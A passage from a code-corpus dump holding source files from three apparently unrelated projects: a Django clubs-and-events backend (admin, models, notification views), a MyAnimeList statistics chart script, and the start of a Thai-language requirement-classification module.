def _test_delete_community(self, username=str(), community_id=int(), instance_path='club', allows_delete=True):
''' Test delete community '''
if username.strip() != str():
self.client.login(username=username, password='<PASSWORD>')
response = self.client.delete('/api/community/{}/{}/'.format(instance_path, community_id))
if allows_delete:
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
else:
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
if username.strip() != str():
self.client.logout()
```
#### File: clubs-and-events-backend/core/tests.py
```python
from django.test import TestCase
from core.utils.files import simplify_file_size
class FilesUtilityTest(TestCase):
''' Utility test '''
def test_simplify_file_size(self):
''' Test simplify file size function '''
self.assertEqual(simplify_file_size(7, unit='b'), '7 bits')
self.assertEqual(simplify_file_size(8, unit='b'), '1 bytes')
self.assertEqual(simplify_file_size(9, unit='b'), '1 bytes')
self.assertEqual(simplify_file_size(8191, unit='b'), '1023 bytes')
self.assertEqual(simplify_file_size(8192, unit='b'), '1.00 kB')
self.assertEqual(simplify_file_size(8193, unit='b'), '1.00 kB')
self.assertEqual(simplify_file_size(8388607, unit='b'), '1023.99 kB')
self.assertEqual(simplify_file_size(8388608, unit='b'), '1.00 MB')
self.assertEqual(simplify_file_size(8388609, unit='b'), '1.00 MB')
self.assertEqual(simplify_file_size(1023, unit='B'), '1023 bytes')
self.assertEqual(simplify_file_size(1024, unit='B'), '1.00 kB')
self.assertEqual(simplify_file_size(1025, unit='B'), '1.00 kB')
self.assertEqual(simplify_file_size(1048575, unit='B'), '1023.99 kB')
self.assertEqual(simplify_file_size(1048576, unit='B'), '1.00 MB')
self.assertEqual(simplify_file_size(1048577, unit='B'), '1.00 MB')
self.assertEqual(simplify_file_size(1073741823, unit='B'), '1023.99 MB')
self.assertEqual(simplify_file_size(1073741824, unit='B'), '1.00 GB')
self.assertEqual(simplify_file_size(1073741825, unit='B'), '1.00 GB')
self.assertEqual(simplify_file_size(1023, unit='kB'), '1023.00 kB')
self.assertEqual(simplify_file_size(1024, unit='kB'), '1.00 MB')
self.assertEqual(simplify_file_size(1025, unit='kB'), '1.00 MB')
self.assertEqual(simplify_file_size(1048575, unit='kB'), '1023.99 MB')
self.assertEqual(simplify_file_size(1048576, unit='kB'), '1.00 GB')
self.assertEqual(simplify_file_size(1048577, unit='kB'), '1.00 GB')
self.assertEqual(simplify_file_size(1073741823, unit='kB'), '1023.99 GB')
self.assertEqual(simplify_file_size(1073741824, unit='kB'), '1.00 TB')
self.assertEqual(simplify_file_size(1073741825, unit='kB'), '1.00 TB')
```
#### File: core/utils/users.py
```python
from crum import get_current_request
from clubs_and_events.settings import EMAIL_DOMAIN_NAME
from user.permissions import IsStudentObject
def get_email(user):
''' Retrieves default IT KMITL email '''
if IsStudentObject().has_object_permission(get_current_request(), None, user) and user.username[0:2] == 'it':
return user.username[2:] + '@' + EMAIL_DOMAIN_NAME
return user.username + '@' + EMAIL_DOMAIN_NAME
def get_client_ip(request):
''' Retrieves client's IP address '''
if request is None:
return None
x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')
if x_forwarded_for is not None:
ip = x_forwarded_for.split(',')[0]
else:
ip = request.META.get('REMOTE_ADDR')
return ip
```
#### File: clubs-and-events-backend/membership/admin.py
```python
from django.contrib import admin
from community.models import Club, Event, Lab, CommunityEvent
from core.utils.files import get_file_size
from core.utils.general import truncate, has_instance
from membership.models import Request, Invitation, Advisory, Membership, CustomMembershipLabel, MembershipLog
from membership.models import ApprovalRequest
import datetime
class RequestAdmin(admin.ModelAdmin):
''' Request admin '''
list_display = ('id', 'user', 'community', 'status', 'created_at', 'updated_at', 'updated_by')
readonly_fields = ('updated_by',)
list_per_page = 20
def get_readonly_fields(self, request, obj=None):
''' Get read-only fields '''
if obj is not None:
if obj.status != 'W':
return ('user', 'community', 'status') + self.readonly_fields
return ('user', 'community') + self.readonly_fields
return self.readonly_fields
class InvitationAdmin(admin.ModelAdmin):
''' Invitation admin '''
list_display = ('id', 'community', 'invitor', 'invitee', 'status', 'created_at', 'updated_at')
list_per_page = 20
def get_readonly_fields(self, request, obj=None):
''' Get read-only fields '''
if obj is not None:
if obj.status != 'W':
return ('community', 'invitor', 'invitee', 'status') + self.readonly_fields
return ('community', 'invitor', 'invitee') + self.readonly_fields
return self.readonly_fields
class AdvisoryAdmin(admin.ModelAdmin):
''' Advisory admin '''
list_display = ('id', 'advisor', 'community', 'start_date', 'end_date', 'is_active', 'created_at', 'created_by',
'updated_at', 'updated_by')
readonly_fields = ('created_by', 'updated_by')
list_per_page = 20
def get_readonly_fields(self, request, obj=None):
''' Get read-only fields '''
if obj is not None:
return ('advisor', 'community') + self.readonly_fields
return self.readonly_fields
def is_active(self, obj):
''' Get active status '''
return obj.start_date <= datetime.datetime.now().date() <= obj.end_date
is_active.boolean = True
class CustomMembershipLabelInline(admin.StackedInline):
''' Custom membership label inline '''
model = CustomMembershipLabel
readonly_fields = ('created_by', 'updated_by')
class MembershipLogInline(admin.TabularInline):
''' Membership log inline '''
model = MembershipLog
readonly_fields = ('position', 'status', 'start_datetime', 'created_by', 'updated_by')
exclude = ('end_datetime',)
def has_add_permission(self, request, obj):
''' Restricts add permission '''
return False
def has_change_permission(self, request, obj=None):
''' Restricts change permission '''
return False
def has_delete_permission(self, request, obj=None):
''' Restricts delete permission '''
return False
class MembershipAdmin(admin.ModelAdmin):
''' Membership admin '''
list_display = ('id', 'user', 'community', 'position', 'position_name', 'is_active', 'status', 'custom_label',
'created_at', 'created_by', 'updated_at', 'updated_by')
readonly_fields = ('created_by', 'updated_by',)
inlines = (CustomMembershipLabelInline, MembershipLogInline)
list_per_page = 20
def get_readonly_fields(self, request, obj=None):
''' Get read-only fields '''
if obj is not None:
return ('user', 'community') + self.readonly_fields
return self.readonly_fields
def position_name(self, obj):
''' Get position name '''
try:
if has_instance(obj.community, Club):
return ('Member', 'Staff', 'Vice-President', 'President')[obj.position]
elif has_instance(obj.community, Event) and not has_instance(obj.community, CommunityEvent):
return ('Participator', 'Staff', 'Event Co-Creator', 'Event Creator')[obj.position]
elif has_instance(obj.community, CommunityEvent):
return ('Participator', 'Staff', 'Vice-President', 'President')[obj.position]
elif has_instance(obj.community, Lab):
return ('Lab Member', 'Lab Helper', 'Lab Co-Supervisor', 'Lab Supervisor')[obj.position]
return None
except IndexError:
return None
def is_active(self, obj):
''' Get active status '''
return obj.status == 'A'
is_active.boolean = True
def custom_label(self, obj):
''' Get custom label '''
return CustomMembershipLabel.objects.get(membership_id=obj.id).label
class MembershipLogAdmin(admin.ModelAdmin):
''' Membership log admin '''
list_display = ('id', 'membership', 'position', 'status', 'start_datetime', 'end_datetime', 'created_by',
'updated_by')
list_per_page = 20
def has_add_permission(self, request):
''' Restricts add permission '''
return False
def has_change_permission(self, request, obj=None):
''' Restricts change permission '''
return False
class ApprovalRequestAdmin(admin.ModelAdmin):
''' Approval request admin '''
list_display = ('id', 'community', 'partial_message', 'attached_file_size', 'status', 'created_at', 'created_by',
'updated_at', 'updated_by')
readonly_fields = ('attached_file_size', 'created_by', 'updated_by',)
list_per_page = 20
def partial_message(self, obj):
''' Get partial message '''
return truncate(obj.message, max_length=32)
def attached_file_size(self, obj):
''' Get attached file size '''
try:
return get_file_size(obj.attached_file)
except ValueError:
return str()
except FileNotFoundError:
return 'FileNotFoundError'
admin.site.register(Request, RequestAdmin)
admin.site.register(Invitation, InvitationAdmin)
admin.site.register(Advisory, AdvisoryAdmin)
admin.site.register(Membership, MembershipAdmin)
admin.site.register(MembershipLog, MembershipLogAdmin)
admin.site.register(ApprovalRequest, ApprovalRequestAdmin)
```
#### File: clubs-and-events-backend/misc/models.py
```python
from django.contrib.auth import get_user_model
from django.core.exceptions import ValidationError
from django.db import models
from django.utils.translation import gettext as _
from clubs_and_events.settings import STORAGE_BASE_DIR
from community.models import Event
from core.utils.general import truncate, get_file_extension, has_instance
from core.utils.objects import save_user_attributes
from membership.models import Membership
class FAQ(models.Model):
''' Frequently asked question (FAQ) model '''
def get_image_path(self, file_name):
''' Retrieve image path '''
return '{}/faq/{}.{}'.format(STORAGE_BASE_DIR, self.id, get_file_extension(file_name))
question_en = models.CharField(max_length=255)
question_th = models.CharField(max_length=255)
answer_en = models.TextField(max_length=2048)
answer_th = models.TextField(max_length=2048)
image = models.ImageField(null=True, blank=True, upload_to=get_image_path)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
created_by = models.ForeignKey(get_user_model(), on_delete=models.SET_NULL, null=True, blank=True,
related_name='faq_created_by')
updated_by = models.ForeignKey(get_user_model(), on_delete=models.SET_NULL, null=True, blank=True,
related_name='faq_updated_by')
def __str__(self):
''' String representation '''
return '{}'.format(truncate(self.question_en, max_length=32))
def save(self, *args, **kwargs):
''' Save instance '''
save_user_attributes(self, created_by_field_name='created_by', updated_by_field_name='updated_by')
if self.pk is None:
saved_image = self.image
self.image = None
super(FAQ, self).save(*args, **kwargs)
self.image = saved_image
if 'force_insert' in kwargs:
kwargs.pop('force_insert')
super(FAQ, self).save(*args, **kwargs)
class Vote(models.Model):
''' Vote model '''
comment = models.TextField(max_length=512, blank=True)
voted_for = models.ForeignKey(Membership, on_delete=models.CASCADE, related_name='vote_voted_for')
voted_by = models.ForeignKey(get_user_model(), on_delete=models.CASCADE, related_name='vote_voted_by')
created_at = models.DateTimeField(auto_now_add=True)
def save(self, *args, **kwargs):
''' Save instance '''
save_user_attributes(self, created_by_field_name='voted_by', updated_by_field_name=None)
super(Vote, self).save(*args, **kwargs)
def clean(self):
''' Validate on save '''
errors = list()
if not has_instance(self.voted_for.community, Event):
errors.append(ValidationError(_('Votes can only be casted in events.'), code='non_event'))
if len(errors) > 0:
raise ValidationError(errors)
```
#### File: clubs-and-events-backend/notification/admin.py
```python
from django.contrib import admin
from core.utils.general import has_instance
from notification.models import Notification, RequestNotification, MembershipLogNotification
from notification.models import AnnouncementNotification, CommunityEventNotification, EventNotification
class NotificationAdmin(admin.ModelAdmin):
''' Notification admin '''
list_display = ('user', 'is_read', 'notification_type', 'created_at', 'created_by', 'updated_at', 'updated_by')
readonly_fields = ('created_by', 'updated_by')
list_per_page = 20
def get_readonly_fields(self, request, obj=None):
''' Get read-only fields '''
if obj is not None:
return ('user',) + self.readonly_fields
return self.readonly_fields
def has_add_permission(self, request):
''' Restricts add permission '''
return False
def has_change_permission(self, request, obj=None):
''' Restricts change permission '''
return False
def notification_type(self, obj):
''' Get notification type '''
if has_instance(obj, RequestNotification):
return 'Request'
elif has_instance(obj, MembershipLogNotification):
return 'Membership Log'
elif has_instance(obj, AnnouncementNotification):
return 'Announcement'
elif has_instance(obj, CommunityEventNotification):
return 'Community Event'
elif has_instance(obj, EventNotification):
return 'Event'
return None
class RequestNotificationAdmin(admin.ModelAdmin):
''' Request notification admin '''
list_display = ('user', 'request', 'is_read', 'created_at', 'created_by', 'updated_at', 'updated_by')
readonly_fields = ('created_by', 'updated_by')
list_per_page = 20
def get_readonly_fields(self, request, obj=None):
''' Get read-only fields '''
if obj is not None:
return ('user', 'request') + self.readonly_fields
return self.readonly_fields
def has_add_permission(self, request):
''' Restricts add permission '''
return False
def has_change_permission(self, request, obj=None):
''' Restricts change permission '''
return False
class MembershipLogNotificationAdmin(admin.ModelAdmin):
''' Membership log notification admin '''
list_display = ('user', 'membership_log', 'is_read', 'created_at', 'created_by', 'updated_at', 'updated_by')
readonly_fields = ('created_by', 'updated_by')
list_per_page = 20
def get_readonly_fields(self, request, obj=None):
''' Get read-only fields '''
if obj is not None:
return ('user', 'membership_log') + self.readonly_fields
return self.readonly_fields
def has_add_permission(self, request):
''' Restricts add permission '''
return False
def has_change_permission(self, request, obj=None):
''' Restricts change permission '''
return False
class AnnouncementNotificationAdmin(admin.ModelAdmin):
''' Announcement notification admin '''
list_display = ('user', 'announcement', 'is_read', 'created_at', 'created_by', 'updated_at', 'updated_by')
readonly_fields = ('created_by', 'updated_by')
list_per_page = 20
def get_readonly_fields(self, request, obj=None):
''' Get read-only fields '''
if obj is not None:
return ('user', 'announcement') + self.readonly_fields
return self.readonly_fields
def has_add_permission(self, request):
''' Restricts add permission '''
return False
def has_change_permission(self, request, obj=None):
''' Restricts change permission '''
return False
class CommunityEventNotificationAdmin(admin.ModelAdmin):
''' Community event notification admin '''
list_display = ('user', 'community_event', 'is_read', 'created_at', 'created_by', 'updated_at', 'updated_by')
readonly_fields = ('created_by', 'updated_by')
list_per_page = 20
def get_readonly_fields(self, request, obj=None):
''' Get read-only fields '''
if obj is not None:
return ('user', 'community_event') + self.readonly_fields
return self.readonly_fields
def has_add_permission(self, request):
''' Restricts add permission '''
return False
def has_change_permission(self, request, obj=None):
''' Restricts change permission '''
return False
class EventNotificationAdmin(admin.ModelAdmin):
''' Event notification admin '''
list_display = ('user', 'event', 'is_read', 'created_at', 'created_by', 'updated_at', 'updated_by')
readonly_fields = ('created_by', 'updated_by')
list_per_page = 20
def get_readonly_fields(self, request, obj=None):
''' Get read-only fields '''
if obj is not None:
return ('user', 'event') + self.readonly_fields
return self.readonly_fields
def has_add_permission(self, request):
''' Restricts add permission '''
return False
def has_change_permission(self, request, obj=None):
''' Restricts change permission '''
return False
admin.site.register(Notification, NotificationAdmin)
admin.site.register(RequestNotification, RequestNotificationAdmin)
admin.site.register(MembershipLogNotification, MembershipLogNotificationAdmin)
admin.site.register(AnnouncementNotification, AnnouncementNotificationAdmin)
admin.site.register(CommunityEventNotification, CommunityEventNotificationAdmin)
admin.site.register(EventNotification, EventNotificationAdmin)
```
#### File: clubs-and-events-backend/notification/views.py
```python
from rest_framework import permissions, viewsets, status
from rest_framework.decorators import api_view
from rest_framework.response import Response
from smtplib import SMTPAuthenticationError
from asset.models import Announcement
from clubs_and_events.settings import EMAIL_NOTIFICATIONS
from community.models import Event, CommunityEvent
from core.permissions import IsInActiveCommunity
from core.utils.filters import filter_queryset_permission, limit_queryset
from core.utils.users import get_email
from membership.models import Request, Invitation
from notification.models import Notification, RequestNotification, MembershipLogNotification
from notification.models import AnnouncementNotification, CommunityEventNotification, EventNotification
from notification.notifier import send_mail_notification, send_mail_notification_process
from notification.permissions import IsNotificationOwner
from notification.serializers import NotificationSerializer, RequestNotificationSerializer
from notification.serializers import MembershipLogNotificationSerializer, AnnouncementNotificationSerializer
from notification.serializers import CommunityEventNotificationSerializer, EventNotificationSerializer
from user.models import EmailPreference
class NotificationViewSet(viewsets.ModelViewSet):
''' Notification view set '''
queryset = Notification.objects.all()
serializer_class = NotificationSerializer
permission_classes = (permissions.IsAuthenticated, IsInActiveCommunity, IsNotificationOwner)
http_method_names = ('get', 'put', 'patch', 'delete', 'head', 'options')
def list(self, request, *args, **kwargs):
''' List notifications '''
queryset = self.get_queryset()
queryset = filter_queryset_permission(queryset, request, self.get_permissions())
queryset = limit_queryset(queryset, request)
serializer = self.get_serializer(queryset, many=True)
return Response(serializer.data)
class RequestNotificationViewSet(NotificationViewSet):
''' Request notification view set '''
queryset = RequestNotification.objects.all()
serializer_class = RequestNotificationSerializer
class MembershipLogNotificationViewSet(NotificationViewSet):
''' Membership log notification view set '''
queryset = MembershipLogNotification.objects.all()
serializer_class = MembershipLogNotificationSerializer
class AnnouncementNotificationViewSet(NotificationViewSet):
''' Announcement notification view set '''
queryset = AnnouncementNotification.objects.all()
serializer_class = AnnouncementNotificationSerializer
class CommunityEventNotificationViewSet(NotificationViewSet):
''' Community event notification view set '''
queryset = CommunityEventNotification.objects.all()
serializer_class = CommunityEventNotificationSerializer
class EventNotificationViewSet(NotificationViewSet):
''' Event notification view set '''
queryset = EventNotification.objects.all()
serializer_class = EventNotificationSerializer
@api_view(['POST'])
def test_send_mail(request):
''' Test send mail API '''
# Check superuser authentication
if not request.user.is_authenticated and not request.user.is_superuser:
return Response({'detail': 'Not superuser.'}, status=status.HTTP_403_FORBIDDEN)
# Check object details
try:
obj_type = request.data['type']
except KeyError:
return Response({'detail': 'Object type was not provided.'}, status=status.HTTP_400_BAD_REQUEST)
try:
obj_id = request.data['id']
except KeyError:
return Response({'detail': 'Object ID was not provided.'}, status=status.HTTP_400_BAD_REQUEST)
# Check language
try:
lang = request.data['lang']
except KeyError:
lang = 'en'
# Check object type
if obj_type.lower() == 'request':
obj = Request.objects.get(pk=obj_id)
elif obj_type.lower() == 'announcement':
obj = Announcement.objects.get(pk=obj_id)
elif obj_type.lower() == 'community_event':
obj = CommunityEvent.objects.get(pk=obj_id)
elif obj_type.lower() == 'event':
obj = Event.objects.get(pk=obj_id)
elif obj_type.lower() == 'invitation':
obj = Invitation.objects.get(pk=obj_id)
else:
return Response({'detail': 'Invalid object type.'}, status=status.HTTP_400_BAD_REQUEST)
# Verification
_ = EmailPreference.objects.get(user_id=request.user.id)
if not EMAIL_NOTIFICATIONS:
return Response(
{'detail': 'Email notification setting is turned off in \'settings.py\'.'},
status=status.HTTP_400_BAD_REQUEST
)
elif not eval('_.receive_{}'.format(obj_type.lower())):
return Response(
{'detail': 'User\'s email preference for \'{}\' is turned off.'.format(obj_type.lower())},
status=status.HTTP_400_BAD_REQUEST
)
# Send mail notification
try:
send_mail_notification_process(users=(request.user,), lang=lang, obj=obj)
except SMTPAuthenticationError as exception:
return Response({'detail': exception.__str__()}, status=status.HTTP_400_BAD_REQUEST)
# Response
return Response(
{'detail': 'Mail notification sent to {}.'.format(get_email(request.user))}, status=status.HTTP_200_OK
)
```
#### File: clubs-and-events-backend/user/admin.py
```python
from datetime import datetime
from django import forms
from django.contrib import admin
from django.contrib.auth import get_user_model
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from django.utils.translation import gettext as _
from core.utils.files import get_image_size
from core.utils.general import truncate
from user.models import EmailPreference, StudentCommitteeAuthority
class AlwaysChangedModelForm(forms.ModelForm):
''' A model form class used to set field as always updated '''
def has_changed(self):
return True
class EmailPreferenceInline(admin.StackedInline):
''' Email preference inline '''
model = EmailPreference
form = AlwaysChangedModelForm
extra = 1
readonly_fields = ('unsubscribe_key',)
class StudentCommitteeAuthorityInline(admin.StackedInline):
''' Student committee authority inline '''
model = StudentCommitteeAuthority
readonly_fields = ('created_at', 'created_by', 'updated_at', 'updated_by')
extra = 0
fk_name = 'user'
class UserAdmin(BaseUserAdmin):
''' User admin '''
list_display = ('id', 'username', 'name', 'user_group', 'is_active', 'is_staff', 'is_superuser',
'profile_picture_size')
inlines = (EmailPreferenceInline, StudentCommitteeAuthorityInline)
readonly_fields = ('last_login', 'created_at', 'created_by', 'updated_at', 'updated_by')
list_per_page = 20
fieldsets = (
(None, {'fields': ('username', 'name', 'password')}),
(_('Profile'), {'fields': ('nickname', 'bio', 'profile_picture', 'birthdate')}),
(_('Timestamps'), {'fields': ('last_login', 'created_at', 'created_by', 'updated_at', 'updated_by')}),
(_('Permissions'), {'fields': ('user_group', 'is_active', 'is_staff', 'is_superuser')}),
)
add_fieldsets = (
(None, {'fields': ('username', 'name', '<PASSWORD>', '<PASSWORD>')}),
(_('Profile'), {'fields': ('nickname', 'bio', 'profile_picture', 'birthdate')}),
(_('Permissions'), {'fields': ('user_group', 'is_active', 'is_staff', 'is_superuser')}),
)
def profile_picture_size(self, obj):
''' Get profile picture size and dimensions '''
try:
return get_image_size(obj.profile_picture)
except ValueError:
return str()
except FileNotFoundError:
return 'FileNotFoundError'
class EmailPreferenceAdmin(admin.ModelAdmin):
''' Email preference admin '''
readonly_fields = ('unsubscribe_key',)
list_display = ('id', 'user', 'name', 'receive_request', 'receive_announcement', 'receive_community_event',
'receive_event', 'receive_invitation', 'email_language', 'partial_unsubscribe_key')
list_per_page = 20
def has_add_permission(self, request):
''' Disable add permission '''
return False
def get_readonly_fields(self, request, obj=None):
''' Get read-only fields '''
if obj is not None:
return ('user',) + self.readonly_fields
return self.readonly_fields
def name(self, obj):
''' Get name of the user '''
return obj.user.name
def partial_unsubscribe_key(self, obj):
''' Get truncated unsubscribe key '''
return truncate(obj.unsubscribe_key, max_length=24)
class StudentCommitteeAuthorityAdmin(admin.ModelAdmin):
''' Student committee authority admin '''
list_display = ('id', 'user', 'start_date', 'end_date', 'is_active', 'created_at', 'created_by', 'updated_at',
'updated_by')
readonly_fields = ('created_by', 'updated_by')
list_per_page = 20
def get_readonly_fields(self, request, obj=None):
''' Get read-only fields '''
if obj is not None:
return ('user',) + self.readonly_fields
return self.readonly_fields
def is_active(self, obj):
''' Get active status '''
return obj.start_date <= datetime.now().date() <= obj.end_date
is_active.boolean = True
admin.site.register(get_user_model(), UserAdmin)
admin.site.register(EmailPreference, EmailPreferenceAdmin)
admin.site.register(StudentCommitteeAuthority, StudentCommitteeAuthorityAdmin)
``` |
{
"source": "810Teams/mal-chart-maker",
"score": 2
} |
#### File: 810Teams/mal-chart-maker/script_chart.py
```python
from settings import USE_API, MAL_USERNAME, DISPLAY_ANIME_STATS, DISPLAY_MANGA_STATS
from settings import ENABLE_TAG_VALIDATIONS, MUST_BE_TAGGED, MUST_BE_UNTAGGED, APPLY_TAG_RULES
from settings import CHART_STYLE, MANUAL_SORT_ANIME, ENABLE_AUTO_CHART_OPEN
from src.loader import Loader, Parser
from src.render import RenderMachine
from src.utils import notice, error
import os
import platform
import requests
import sys
def main():
''' Main function '''
# Verify API usage settings
if not USE_API:
loader = Loader('data/')
else:
if len(sys.argv) > 1 and len(sys.argv[1]) > 0:
loader = Parser(sys.argv[1])
else:
loader = Parser(MAL_USERNAME)
# Load data
loader.create_document()
user = loader.get_user_object(
include_current=True,
include_onhold=True,
include_dropped=True,
include_planned=True
)
# Retrieve improper tagged entries
improper_tagged_anime = ', '.join(get_improper_tagged(user, list_type='anime'))
improper_tagged_manga = ', '.join(get_improper_tagged(user, list_type='manga'))
# User data displaying
print()
print('- User Data -')
print(' Username: {}'.format(user.info.user_name))
print(' User ID: {}'.format(user.info.user_id))
print()
# Anime statistics displaying
if DISPLAY_ANIME_STATS:
print('- Anime Data -')
print(' List Data', end='\n ')
print('Total: {}'.format(user.anime_list.count('all')), end=' | ')
print('Watching: {}'.format(user.anime_list.count('watching')), end=' | ')
print('Completed: {}'.format(user.anime_list.count('completed')), end=' | ')
print('On-Hold: {}'.format(user.anime_list.count('on-hold')), end=' | ')
print('Dropped: {}'.format(user.anime_list.count('dropped')), end=' | ')
print('Planned: {}'.format(user.anime_list.count('plan to watch')))
print()
if sum(user.anime_list.get_scores()) != 0:
print(' Scoring Data', end='\n ')
print('Total: {}'.format(len(user.anime_list.get_scores())), end=' | ')
print('Range: {}~{}'.format(user.anime_list.get_min(), user.anime_list.get_max()), end=' | ')
print('Average: {:.2f}'.format(user.anime_list.get_average()), end=' | ')
print('Median: {:g}'.format(user.anime_list.get_median()), end=' | ')
print('SD: {:.2f}'.format(user.anime_list.get_sd()))
print()
print(' Improper Tagged')
print(' {}'.format(improper_tagged_anime) if len(improper_tagged_anime) > 0 else ' None, all anime are being tagged properly.')
print()
# Manga statistics displaying
if DISPLAY_MANGA_STATS:
print('- Manga Data -')
print(' List Data', end='\n ')
print('Total: {}'.format(user.manga_list.count('all')), end=' | ')
print('Reading: {}'.format(user.manga_list.count('reading')), end=' | ')
print('Completed: {}'.format(user.manga_list.count('completed')), end=' | ')
print('On-Hold: {}'.format(user.manga_list.count('on-hold')), end=' | ')
print('Dropped: {}'.format(user.manga_list.count('dropped')), end=' | ')
print('Planned: {}'.format(user.manga_list.count('plan to read')))
print()
if sum(user.manga_list.get_scores()) != 0:
print(' Scoring Data', end='\n ')
print('Total: {}'.format(len(user.manga_list.get_scores())), end=' | ')
print('Range: {}~{}'.format(user.manga_list.get_min(), user.manga_list.get_max()), end=' | ')
print('Average: {:.2f}'.format(user.manga_list.get_average()), end=' | ')
print('Median: {:g}'.format(user.manga_list.get_median()), end=' | ')
print('SD: {:.2f}'.format(user.manga_list.get_sd()))
print()
print(' Improper Tagged')
print(' {}'.format(improper_tagged_manga) if len(improper_tagged_manga) > 0 else ' None, all manga are being tagged properly.')
print()
# Render machine initiation
render_machine = RenderMachine('charts/', style=CHART_STYLE)
# Render anime charts
if sum(user.anime_list.get_scores()) != 0:
# Render anime pie chart
render_machine.render_pie_chart(
user.anime_list.get_grouped_list(
group_by='series_type',
manual_sort=MANUAL_SORT_ANIME,
disassemble_key=['my_score', 'series_title']
),
title='{}\'{} Anime Series Types'.format(user.info.user_name, 's' * (user.info.user_name[-1] != 's')),
file_name='anime_series_types'
)
# Render anime bar charts
render_machine.render_bar_chart(
user.anime_list.get_summed_scores(),
title='{}\'{} Scored Anime Titles'.format(user.info.user_name, 's' * (user.info.user_name[-1] != 's')),
file_name='anime_scored'
)
render_machine.render_bar_chart(
user.anime_list.get_summed_grouped_scores(
group_by='series_type',
manual_sort=MANUAL_SORT_ANIME
),
title='{}\'{} Scored Anime Titles (By Series Type)'.format(user.info.user_name, 's' * (user.info.user_name[-1] != 's')),
file_name='anime_scored_by_series_type'
)
# Render anime treemap chart
render_machine.render_treemap(
user.anime_list.get_grouped_list(
group_by='series_type',
manual_sort=MANUAL_SORT_ANIME,
disassemble_key=['my_score', 'series_title']
),
title='{}\'{} Scored Anime Treemap'.format(user.info.user_name, 's' * (user.info.user_name[-1] != 's')),
file_name='anime_treemap'
)
# Render manga chart
if sum(user.manga_list.get_scores()) != 0:
# Render manga bar chart
render_machine.render_bar_chart(
user.manga_list.get_summed_scores(),
title='{}\'{} Scored Manga Titles'.format(user.info.user_name, 's' * (user.info.user_name[-1] != 's')),
file_name='manga_scored'
)
# Auto-open charts
if ENABLE_AUTO_CHART_OPEN:
try:
if platform.system() == 'Windows':
notice('Opening chart files automatically is unsupported on Windows.')
else:
os.system('open charts/*')
notice('Opening chart files.')
except (FileNotFoundError, OSError, PermissionError):
error('Something unexpected happened, please try again.')
# Windows' cmd line fix
if platform.system() != 'Windows':
print()
def get_improper_tagged(user, list_type='anime'):
''' Get improper tagged anime/manga title list '''
# Verify settings
if not ENABLE_TAG_VALIDATIONS:
return list()
# Loads list
if list_type == 'anime':
entry_list = user.anime_list.get_full_list(include_unscored=True)
elif list_type == 'manga':
entry_list = user.manga_list.get_full_list(include_unscored=True)
else:
return None
# Tagged-untagged validation
improper = list()
improper += [i for i in entry_list if (not isinstance(i.my_tags, str) or len(i.my_tags) == 0) and i.my_status in MUST_BE_TAGGED] # not tagged in must tagged
improper += [i for i in entry_list if (isinstance(i.my_tags, str) and len(i.my_tags) > 0) and i.my_status in MUST_BE_UNTAGGED] # tagged in must untagged
# Loads tag rules
tag_rules = [i.replace('\n', str()) for i in open('TAG_RULES.txt')]
tag_rules = [tuple(sorted([j.lower().strip() for j in i.split(',')])) for i in tag_rules]
# Filter entries for tag validation
temp = [i for i in entry_list if isinstance(i.my_tags, str) and i.my_status in APPLY_TAG_RULES]
# Tag rules validation
if len(tag_rules) > 0:
for i in range(len(temp)):
temp[i].my_tags = tuple(sorted([j.lower().strip() for j in temp[i].my_tags.split(',')]))
if temp[i].my_tags not in tag_rules:
improper.append(temp[i])
# Return
if list_type == 'anime':
return [i.series_title for i in improper]
elif list_type == 'manga':
return [i.manga_title for i in improper]
if __name__ == '__main__':
main()
``` |
{
"source": "810Teams/requirement-classification",
"score": 3
} |
#### File: requirement-classification/requirement/analysis.py
```python
from pythainlp.corpus.common import thai_words
from pythainlp.tag import pos_tag
from pythainlp import Tokenizer
from pandas import read_csv
from numpy import array
from requirement.models import AnalyzedRequirement
class RequirementData():
'''
Class: RequirementData
Purpose: Contains title and all requirements that have been submitted by user
'''
def __init__(self, title, requirements):
self.title = title # Type: String
if isinstance(requirements, str):
requirements = [i.strip() for i in requirements.split('\n') if i.strip() != '']
for i in range(len(requirements)):
requirements[i] = Requirement(i + 1, requirements[i].replace('\n', ''))
self.requirements = requirements # Type: List<Requirement>
self.by_priority = self.analyze_priority() # Type: RequirementPriorityGroup
self.by_functionality = self.analyze_functionality() # Type: RequirementFunctionalityGroup
self.by_keywords = self.analyze_keywords() # Type: RequirementKeywordGroup
def analyze_priority(self):
response = get_data_group_by_priority(self.requirements)
# Assign values to Requirement objects
for i in response[0]:
i.priority = 2
for i in response[1]:
i.priority = 1
for i in response[2]:
i.priority = 0
return RequirementPriorityGroup(response[0], response[1], response[2])
def analyze_functionality(self):
response = get_data_group_by_functionality(self.requirements)
# Assign values to Requirement objects
for i in range(len(response)):
for j in response[i]:
j.is_functional = not bool(i)
return RequirementFunctionalityGroup(response[0], response[1])
def analyze_keywords(self):
response = get_data_group_by_keyword(self.requirements)
# Assign values to Requirement objects
for i in response:
if i != 'อื่น ๆ':
for j in response[i]:
j.keywords.append(i)
return [RequirementKeywordGroup(i, response[i]) for i in response]
class Requirement():
'''
Class: Requirement
Purpose: Contains data of a single requirement
'''
def __init__(self, id, description):
self.id = id # Type: Integer
self.description = description # Type: String
self.priority = None # Type: Integer
self.is_functional = None # Type: Boolean
self.keywords = list() # Type: List
class RequirementPriorityGroup():
'''
Class: RequirementPriorityGroup
Purpose: Contains requirements grouped in priority levels
'''
def __init__(self, high, medium, low):
self.high = high # Type: List<Requirement>
self.medium = medium # Type: List<Requirement>
self.low = low # Type: List<Requirement>
class RequirementFunctionalityGroup():
'''
Class: RequirementFunctionalityGroup
Purpose: Contains requirements grouped in functionality
'''
def __init__(self, functional, non_functional):
self.functional = functional # Type: List<Requirement>
self.non_functional = non_functional # Type: List<Requirement>
class RequirementKeywordGroup():
'''
Class: RequirementKeywordGroup
Purpose: Contains requirements related to a certain keyword
'''
def __init__(self, keyword, requirements):
self.keyword = keyword # Type: String
self.requirements = requirements # Type: List<Requirement>
class Keyword():
'''
Class: Keyword
Purpose: Contains data of keyword
'''
def __init__(self, word, weight):
self.word = word # Type: String
self.weight = weight # Type: Integer
class TreeNode():
def __init__(self, data):
self.data = data # Type: <Dynamic>
self.children = list() # Type: List<Dynamic>
THAI_WORDS = set(thai_words())
